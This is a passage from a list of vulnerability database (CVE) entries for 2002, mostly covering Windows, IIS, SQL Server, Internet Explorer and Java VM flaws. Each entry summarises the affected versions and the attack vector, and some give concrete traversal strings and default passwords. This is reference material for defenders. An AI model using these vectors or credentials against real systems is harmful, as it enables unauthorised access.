prevent events from being recorded by opening the log file using an application such as Microsoft's Event Viewer. [CVE-2002-1861] Sybase Enterprise Application Server 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1860] Pramati Server 3.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1859] Orion Application Server 1.5.3, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1858] Oracle Oracle9i Application Server 1.0.2.2 and 9.0.2 through 9.0.2.0.1, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1857] jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1856] HP Application Server 8.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1855] Macromedia JRun 3.0 through 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1848] TightVNC before 1.2.4 running on Windows stores unencrypted passwords in the password text control of the WinVNC Properties dialog, which could allow local users to access passwords. [CVE-2002-1839] Trend Micro InterScan VirusWall for Windows NT 3.52 does not record the sender's IP address in the headers for a mail message when it is passed from VirusWall to the MTA, which allows remote attackers to hide the origin of the message. [CVE-2002-1833] The default configurations for DocuTech 6110 and DocuTech 6115 have a default administrative password of (1) "service!" on Solaris 8.0 or (2) "administ" on Windows NT, which allows remote attackers to gain privileges. [CVE-2002-1831] Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via an invite request that contains hex-encoded spaces (%20) in the Invitation-Cookie field. [CVE-2002-1824] Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability. [CVE-2002-1817] Unknown vulnerability in Veritas Cluster Server (VCS) 1.2 for WindowsNT, Cluster Server 1.3.0 for Solaris, and Cluster Server 1.3.1 for HP-UX allows attackers to gain privileges via unknown attack vectors. [CVE-2002-1809] The default configuration of the Windows binary release of MySQL 3.23.2 through 3.23.52 has a NULL root password, which could allow remote attackers to gain unauthorized root access to the MySQL database. [CVE-2002-1795] Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2002-1790] The SMTP service in Microsoft Internet Information Services (IIS) 4.0 and 5.0 allows remote attackers to bypass anti-relaying rules and send spam or spoofed messages via encapsulated SMTP addresses, a similar vulnerability to CVE-1999-0682. [CVE-2002-1780] BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con. NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves. [CVE-2002-1779] The "block fragmented IP Packets" option in Symantec Norton Personal Firewall 2002 (NPW) does not properly protect against certain attacks on Windows vulnerabilities such as jolt2 (CVE-2000-0305). [CVE-2002-1776] DISPUTED NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to bypass virus protection via a Word Macro virus with a .nch or .dbx extension, which is automatically recognized and executed as a Microsoft Office document. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the Office plug-in would detect the virus before it is executed. [CVE-2002-1770] Qualcomm Eudora 5.1 allows remote attackers to execute arbitrary code via an HTML e-mail message that uses a file:// URL in a t:video tag to reference an attached Windows Media Player file containing JavaScript code, which is launched and executed in the My Computer zone by Internet Explorer. [CVE-2002-1769] Microsoft Site Server 3.0 prior to SP4 installs a default user, LDAP_Anonymous, with a default password of LdapPassword_1, which allows remote attackers the "Log on locally" privilege. [CVE-2002-1762] Microsoft Baseline Security Analyzer (MBSA) 1.0 stores security scans in a known location C:\Documents and Settings\username\SecurityScans in plaintext, which could allow remote attackers to obtain sensitive information about the system via malicious active content such as ActiveX controls or Java. [CVE-2002-1749] Windows 2000 Terminal Services, when using the disconnect feature of the client, does not properly lock itself if it is left idle until the screen saver activates and the user disconnects, which could allow attackers to gain administrator privileges. [CVE-2002-1745] Off-by-one error in the CodeBrws.asp sample script in Microsoft IIS 5.0 allows remote attackers to view the source code for files with extensions containing with one additional character after .html, .htm, .asp, or .inc, such as .aspx files. [CVE-2002-1744] Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0 allows remote attackers to view source code and determine the existence of arbitrary files via a hex-encoded "%c0%ae%c0%ae" string, which is the Unicode representation for ".." (dot dot). [CVE-2002-1718] Microsoft Internet Information Server (IIS) 5.1 may allow remote attackers to view the contents of a Frontpage Server Extension (FPSE) file, as claimed using an HTTP request for colegal.htm that contains .. (dot dot) sequences. [CVE-2002-1717] Microsoft Internet Information Server (IIS) 5.1 allows remote attackers to view path information via a GET request to (1) /_vti_pvt/access.cnf, (2) /_vti_pvt/botinfs.cnf, (3) /_vti_pvt/bots.cnf, or (4) /_vti_pvt/linkinfo.cnf. [CVE-2002-1716] The Host() function in the Microsoft spreadsheet component on Microsoft Office XP allows remote attackers to create arbitrary files using the SaveAs capability. [CVE-2002-1714] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to cause a denial of service (crash) via an object of type "text/html" with the DATA field that identifies the HTML document that contains the object, which may cause infinite recursion. [CVE-2002-1705] Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to cause a denial of service (crash) via a Cascading Style Sheet (CSS) with the p{cssText} element declared and a bold font weight. [CVE-2002-1698] Buffer overflow in Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via a long FN (font) argument in the message header. [CVE-2002-1696] Microsoft Outlook plug-in PGP version 7.0, 7.0.3, and 7.0.4 silently saves a decrypted copy of a message to hard disk when "Automatically decrypt/verify when opening messages" option is checked, "Always use Secure Viewer when decrypting" option is not checked, and the user replies to an encrypted message. [CVE-2002-1694] Microsoft Internet Information Server (IIS) 4.0 opens log files with FILE_SHARE_READ and FILE_SHARE_WRITE permissions, which could allow remote attackers to modify the log file contents while IIS is running. [CVE-2002-1688] The browser history feature in Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to execute arbitrary script as other users and steal authentication information via cookies by injecting JavaScript into the URL, which is executed when the user hits the Back button. [CVE-2002-1684] Directory traversal vulnerability in (1) Deerfield D2Gfx 1.0.2 or (2) BadBlue Enterprise Edition 1.5.x and BadBlue Personal Edition 1.5.6 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in the script used to read Microsoft Office documents. [CVE-2002-1671] Microsoft Internet Explorer 5.0, 5.01, and 5.5 allows remote attackers to monitor the contents of the clipboard via the getData method of the clipboardData object. [CVE-2002-1588] Mailtool for OpenWindows 3.6, 3.6.1, and 3.6.2 allows remote attackers to cause a denial of service (mailtool segmentation violation and crash) via a malformed mail attachment. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1325] Microsoft Virtual Machine (VM) build 5.0.3805 and earlier allows remote attackers to determine a local user's username via a Java applet that accesses the user.dir system property, aka "User.dir Exposure Vulnerability." [CVE-2002-1295] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service (crash) and possibly conduct other unauthorized activities via applet tags in HTML that bypass Java class restrictions (such as private constructors) by providing the class name in the code parameter, aka "Incomplete Java Object Instantiation Vulnerability." [CVE-2002-1294] The Microsoft Java implementation, as used in Internet Explorer, can provide HTML object references to applets via Javascript, which allows remote attackers to cause a denial of service (crash due to illegal memory accesses) and possibly conduct other unauthorized activities via an applet that uses those references to access proprietary Microsoft methods. [CVE-2002-1293] The Microsoft Java implementation, as used in Internet Explorer, provides a public load0() method for the CabCracker class (com.ms.vm.loader.CabCracker), which allows remote attackers to bypass the security checks that are performed by the load() method. [CVE-2002-1292] The Microsoft Java virtual machine (VM) build 5.0.3805 and earlier, as used in Internet Explorer, allows remote attackers to extend the Standard Security Manager (SSM) class (com.ms.security.StandardSecurityManager) and bypass intended StandardSecurityManager restrictions by modifying the (1) deniedDefinitionPackages or (2) deniedAccessPackages settings, causing a denial of service by adding Java applets to the list of applets that are prevented from running. [CVE-2002-1291] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read arbitrary local files and network shares via an applet tag with a codebase set to a "file://%00" (null character) URL. [CVE-2002-1290] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read and modify the contents of the Clipboard via an applet that accesses the (1) ClipBoardGetText and (2) ClipBoardSetText methods of the INativeServices class. [CVE-2002-1289] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read restricted process memory, cause a denial of service (crash), and possibly execute arbitrary code via the getNativeServices function, which creates an instance of the com.ms.awt.peer.INativeServices (INativeServices) class, whose methods do not verify the memory addresses that are passed as parameters. [CVE-2002-1288] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to determine the current directory of the Internet Explorer process via the getAbsolutePath() method in a File() call. [CVE-2002-1287] Stack-based buffer overflow in the Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service via a long class name through (1) Class.forName or (2) ClassLoader.loadClass. [CVE-2002-1286] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to steal cookies and execute script in a different security context via a URL that contains a colon in the domain portion, which is not properly parsed and loads an applet from a malicious site within the security context of the site that is being visited by the user. [CVE-2002-1260] The Java Database Connectivity (JDBC) APIs in Microsoft Virtual Machine (VM) 5.0.3805 and earlier allow remote attackers to bypass security checks and access database contents via an untrusted Java applet. [CVE-2002-1258] Two vulnerabilities in Microsoft Virtual Machine (VM) up to and including build 5.0.3805, as used in Internet Explorer and other applications, allow remote attackers to read files via a Java applet with a spoofed location in the CODEBASE parameter in the APPLET tag, possibly due to a parsing error. [CVE-2002-1257] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to execute arbitrary code by including a Java applet that invokes COM (Component Object Model) objects in a web site or an HTML mail. [CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail." [CVE-2002-1230] NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation." [CVE-2002-1181] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors. [CVE-2002-1179] Buffer overflow in the S/MIME Parsing capability in Microsoft Outlook Express 5.5 and 6.0 allows remote attackers to execute arbitrary code via a digitally signed email with a long "From" address, which triggers the overflow when the user views or previews the message. [CVE-2002-1150] The Remote Desktop Sharing (RDS) Screen Saver Protection capability for Microsoft NetMeeting 3.01 through SP2 (4.4.3396) allows attackers with physical access to hijack remote sessions by entering certain logoff or shutdown sequences (such as CTRL-ALT-DEL) and canceling out of the resulting user confirmation prompts, such as when the remote user is editing a document. [CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions. [CVE-2002-1143] Microsoft Word and Excel allow remote attackers to steal sensitive information via certain field codes that insert the information when the document is returned to the attacker, as demonstrated in Word using (1) INCLUDETEXT or (2) INCLUDEPICTURE, aka "Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure." [CVE-2002-1142] Heap-based buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC) 2.1 through 2.6, and Internet Explorer 5.01 through 6.0, allows remote attackers to execute code via a malformed HTTP request to the Data Stub. [CVE-2002-1138] Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, writes output files for scheduled jobs under its own privileges instead of the entity that launched it, which allows attackers to overwrite system files, aka "Flaw in Output File Handling for Scheduled Jobs." [CVE-2002-1137] Buffer overflow in the Database Console Command (DBCC) that handles user inputs in Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, allows attackers to execute arbitrary code via a long SourceDB argument in a "non-SQL OLEDB data source" such as FoxPro, a variant of CAN-2002-0644. [CVE-2002-1123] Buffer overflow in the authentication function for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows remote attackers to execute arbitrary code via a long request to TCP port 1433, aka the "Hello" overflow. [CVE-2002-1117] Veritas Backup Exec 8.5 and earlier requires that the "RestrictAnonymous" registry key for Microsoft Exchange 2000 must be set to 0, which enables anonymous listing of the SAM database and shares. [CVE-2002-1095] Cisco VPN 3000 Concentrator before 2.5.2(F), with encryption enabled, allows remote attackers to cause a denial of service (reload) via a Windows-based PPTP client with the "No Encryption" option set. [CVE-2002-1056] Microsoft Outlook 2000 and 2002, when configured to use Microsoft Word as the email editor, does not block scripts that are used while editing email messages in HTML or Rich Text Format (RTF), which could allow remote attackers to execute arbitrary scripts via an email that the user forwards or replies to. [CVE-2002-1052] Jigsaw 2.2.1 on Windows systems allows remote attackers to use MS-DOS device names in HTTP requests to (1) cause a denial of service using the "con" device, or (2) obtain the physical path of the server using two requests to the "aux" device. [CVE-2002-1042] Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter. [CVE-2002-1029] Res Manager in Worldspan for Windows Gateway 4.1 allows remote attackers to cause a denial of service (crash) via a malformed request to TCP port 17990. [CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers. [CVE-2002-0982] Microsoft SQL Server 2000 SP2, when configured as a distributor, allows attackers to execute arbitrary code via the @scriptfile parameter to the sp_MScopyscript stored procedure. [CVE-2002-0978] Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to upload or download arbitrary files to arbitrary locations via a man-in-the-middle attack with modified TGT and TGN parameters in a call to the "Persist" function. [CVE-2002-0977] Buffer overflow in Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to execute arbitrary code via a long TS value. [CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary via a long File parameter. [CVE-2002-0974] Help and Support Center for Windows XP allows remote attackers to delete arbitrary files via a link to the hcp: protocol that accesses uplddrvinfo.htm. [CVE-2002-0969] Buffer overflow in MySQL daemon (mysqld) before 3.23.50, and 4.0 beta before 4.02, on the Win32 platform, allows local users to execute arbitrary code via a long "datadir" parameter in the my.ini initialization file, whose permissions on Windows allow Full Control to the Everyone group. [CVE-2002-0965] Buffer overflow in TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file. [CVE-2002-0869] Unknown vulnerability in the hosting process (dllhost.exe) for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allows remote attackers to gain privileges by executing an out of process application that acquires LocalSystem privileges, aka "Out of Process Privilege Elevation." [CVE-2002-0867] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to cause a denial of service (crash) in Internet Explorer via invalid handle data in a Java applet, aka "Handle Validation Flaw." [CVE-2002-0866] Java Database Connectivity (JDBC) classes in Microsoft Virtual Machine (VM) up to and including 5.0.3805 allow remote attackers to load and execute DLLs (dynamic link libraries) via a Java applet that calls the constructor for com.ms.jdbc.odbc.JdbcOdbc with the desired DLL terminated by a null string, aka "DLL Execution via JDBC Classes." [CVE-2002-0865] A certain class that supports XML (Extensible Markup Language) in Microsoft Virtual Machine (VM) 5.0.3805 and earlier, probably com.ms.osp.ospmrshl, exposes certain unsafe methods, which allows remote attackers to execute unsafe code via a Java applet, aka "Inappropriate Methods Exposed in XML Support Classes." [CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object. [CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file. [CVE-2002-0859] Buffer overflow in the OpenDataSource function of the Jet engine on Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code. [CVE-2002-0833] Buffer overflow in Eudora 5.1.1 and 5.0-J for Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a multi-part message with a long boundary string. [CVE-2002-0795] The rc system startup script for FreeBSD 4 through 4.5 allows local users to delete arbitrary files via a symlink attack on X Windows lock files. [CVE-2002-0788] An interaction between PGP 7.0.3 with the "wipe deleted files" option, when used on Windows Encrypted File System (EFS), creates a cleartext temporary files that cannot be wiped or deleted due to strong permissions, which could allow certain local users or attackers with physical access to obtain cleartext information. [CVE-2002-0736] Microsoft BackOffice 4.0 and 4.5, when configured to be accessible by other systems, allows remote attackers to bypass authentication and access the administrative ASP pages via an HTTP request with an authorization type (auth_type) that is not blank. [CVE-2002-0729] Microsoft SQL Server 2000 allows remote attackers to cause a denial of service via a malformed 0x08 packet that is missing a colon separator. [CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method. [CVE-2002-0726] Buffer overflow in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to execute arbitrary code via a long server name field. [CVE-2002-0725] NTFS file system in Windows NT 4.0 and Windows 2000 SP2 allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. [CVE-2002-0723] Microsoft Internet Explorer 5.5 and 6.0 does not properly verify the domain of a frame within a browser window, which allows remote attackers to read client files or invoke executable objects via the Object tag, aka "Cross Domain Verification in Object Tag." [CVE-2002-0722] Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to misrepresent the source of a file in the File Download dialogue box to trick users into thinking that the file type is safe to download, aka "File Origin Spoofing." [CVE-2002-0721] Microsoft SQL Server 7.0 and 2000 installs with weak permissions for extended stored procedures that are associated with helper functions, which could allow unprivileged users, and possibly remote attackers, to run stored procedures with administrator privileges via (1) xp_execresultset, (2) xp_printstatements, or (3) xp_displayparamstmt. [CVE-2002-0720] A handler routine for the Network Connection Manager (NCM) in Windows 2000 allows local users to gain privileges via a complex attack that causes the handler to run in the LocalSystem context with user-specified code. [CVE-2002-0719] SQL injection vulnerability in the function that services for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary commands via an MCMS resource request for image files or other files. [CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function." [CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise." [CVE-2002-0698] Buffer overflow in Internet Mail Connector (IMC) for Microsoft Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, which triggers the overflow in IMC's hello response. [CVE-2002-0697] Microsoft Metadirectory Services (MMS) 2.2 allows remote attackers to bypass authentication and modify sensitive data by using an LDAP client to directly connect to MMS and bypass the checks for MMS credentials. [CVE-2002-0696] Microsoft Visual FoxPro 6.0 does not register its associated files with Internet Explorer, which allows remote attackers to execute Visual FoxPro applications without warning via HTML that references specially-crafted filenames. [CVE-2002-0695] Buffer overflow in the Transact-SQL (T-SQL) OpenRowSet component of Microsoft Data Access Components (MDAC) 2.5 through 2.7 for SQL Server 7.0 or 2000 allows remote attackers to execute arbitrary code via a query that calls the OpenRowSet command. [CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request. [CVE-2002-0691] Microsoft Internet Explorer 5.01 and 5.5 allows remote attackers to execute scripts in the Local Computer zone via a URL that references a local HTML resource file, a variant of "Cross-Site Scripting in Local HTML Resource" as identified by CAN-2002-0189. [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters. [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked. [CVE-2002-0650] The keep-alive mechanism for Microsoft SQL Server 2000 allows remote attackers to cause a denial of service (bandwidth consumption) via a "ping" style packet to the Resolution Service (UDP port 1434) with a spoofed IP address of another SQL Server system, which causes the two servers to exchange packets in an infinite loop. [CVE-2002-0649] Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm. [CVE-2002-0648] The legacy <script> data-island capability for XML in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to read arbitrary XML files, and portions of other files, via a URL whose "src" attribute redirects to a local file. [CVE-2002-0647] Buffer overflow in a legacy ActiveX control used to display specially formatted text in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code, aka "Buffer Overrun in Legacy Text Formatting ActiveX Control". [CVE-2002-0645] SQL injection vulnerability in stored procedures for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 may allow authenticated users to execute arbitrary commands. [CVE-2002-0644] Buffer overflow in several Database Consistency Checkers (DBCCs) for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows members of the db_owner and db_ddladmin roles to execute arbitrary code. [CVE-2002-0643] The installation of Microsoft Data Engine 1.0 (MSDE 1.0), and Microsoft SQL Server 2000 creates setup.iss files with insecure permissions and does not delete them after installation, which allows local users to obtain sensitive data, including weakly encrypted passwords, to gain privileges, aka "SQL Server Installation Process May Leave Passwords on System." [CVE-2002-0642] The registry key containing the SQL Server service account information in Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, has insecure permissions, which allows local users to gain privileges, aka "Incorrect Permission on SQL Server Service Account Registry Key." [CVE-2002-0641] Buffer overflow in bulk insert procedure of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows attackers with database administration privileges to execute arbitrary code via a long filename in the BULK INSERT query. [CVE-2002-0624] Buffer overflow in the password encryption function of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows remote attackers to gain control of the database and execute arbitrary code via SQL Server Authentication, aka "Unchecked Buffer in Password Encryption Procedure." [CVE-2002-0623] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 and 2002 allows remote attackers to execute arbitrary code via long authentication data, aka "New Variant of the ISAPI Filter Buffer Overrun". [CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution". [CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer. [CVE-2002-0620] Buffer overflow in the Profile Service of Microsoft Commerce Server 2000 allows remote attackers to cause the server to fail or run arbitrary code in the LocalSystem security context via an input field using an affected API. [CVE-2002-0576] ColdFusion 5.0 and earlier on Windows systems allows remote attackers to determine the absolute pathname of .cfm or .dbm files via an HTTP request that contains an MS-DOS device name such as NUL, which leaks the pathname in an error message. [CVE-2002-0507] An interaction between Microsoft Outlook Web Access (OWA) with RSA SecurID allows local users to bypass the SecurID authentication for a previous user via several submissions of an OWA Authentication request with the proper OWA password for the previous user, which is eventually accepted by OWA. [CVE-2002-0481] An interaction between Windows Media Player (WMP) and Outlook 2002 allows remote attackers to bypass Outlook security settings and execute Javascript via an IFRAME in an HTML email message that references .WMS (Windows Media Skin) or other WMP media files, whose onload handlers execute the player.LaunchURL() Javascript function. [CVE-2002-0421] IIS 4.0 allows local users to bypass the "User cannot change password" policy for Windows NT by directly calling .htr password changing programs in the /iisadmpwd directory, including (1) aexp2.htr, (2) aexp2b.htr, (3) aexp3.htr , or (4) aexp4.htr. [CVE-2002-0419] Information leaks in IIS 4 through 5.1 allow remote attackers to obtain potentially sensitive information or more easily conduct brute force attacks via responses from the server in which (2) in certain configurations, the server IP address is provided as the realm for Basic authentication, which could reveal real IP addresses that were obscured by NAT, or (3) when NTLM authentication is used, the NetBIOS name of the server and its Windows NT domain are revealed in response to an Authorization request. NOTE: this entry originally contained a vector (1) in which the server reveals whether it supports Basic or NTLM authentication through 401 Access Denied error messages. CVE has REJECTED this vector [CVE-2002-0409] orderdetails.aspx, as made available to Microsoft .NET developers as example code and demonstrated on www.ibuyspystore.com, allows remote attackers to view the orders of other users by modifying the OrderID parameter. [CVE-2002-0371] Buffer overflow in gopher client for Microsoft Internet Explorer 5.1 through 6.0, Proxy Server 2.0, or ISA Server 2000 allows remote attackers to execute arbitrary code via a gopher:// URL that redirects the user to a real or simulated gopher server that sends a long response. [CVE-2002-0368] The Store Service in Microsoft Exchange 2000 allows remote attackers to cause a denial of service (CPU consumption) via a mail message with a malformed RFC message attribute, aka "Malformed Mail Attribute can Cause Exchange 2000 to Exhaust CPU Resources." [CVE-2002-0367] smss.exe debugging subsystem in Windows NT and Windows 2000 does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges by duplicating a handle to a privileged process, as demonstrated by DebPloit. [CVE-2002-0366] Buffer overflow in Remote Access Service (RAS) phonebook for Windows NT 4.0, 2000, XP, and Routing and Remote Access Server (RRAS) allows local users to execute arbitrary code by modifying the rasphone.pbk file to use a long dial-up entry. [CVE-2002-0340] Windows Media Player (WMP) 8.00.00.4477, and possibly other versions, automatically detects and executes .wmf and other content, even when the file's extension or content type does not specify .wmf, which could make it easier for attackers to conduct unauthorized activities via Trojan horse files containing .wmf content. [CVE-2002-0314] fasttrack p2p, as used in (1) KaZaA before 1.5, (2) grokster, and (3) morpheus allows remote attackers to cause a denial of service (memory exhaustion) via a series of client-to-client messages, which pops up new windows per message. [CVE-2002-0285] Outlook Express 5.5 and 6.0 on Windows treats a carriage return ("CR") in a message header as if it were a valid carriage return/line feed combination (CR/LF), which could allow remote attackers to bypass virus protection and or other filtering mechanisms via a mail message with headers that only contain the CR, which causes Outlook to create separate headers. [CVE-2002-0283] Windows XP with port 445 open allows remote attackers to cause a denial of service (CPU consumption) via a flood of TCP SYN packets containing possibly malformed data. [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message. [CVE-2002-0228] Microsoft MSN Messenger allows remote attackers to use Javascript that references an ActiveX object to obtain sensitive information such as display names and web site navigation, and possibly more when the user is connected to certain Microsoft sites (or DNS-spoofed sites). [CVE-2002-0208] PGP Security PGPfire 7.1 for Windows alters the system's TCP/IP stack and modifies packets in ICMP error messages in a way that allows remote attackers to determine that the system is running PGPfire. [CVE-2002-0201] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow. [CVE-2002-0200] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. [CVE-2002-0193] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the first variant of the "Content Disposition" vulnerability. [CVE-2002-0191] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to view arbitrary files that contain the "{" character via script containing the 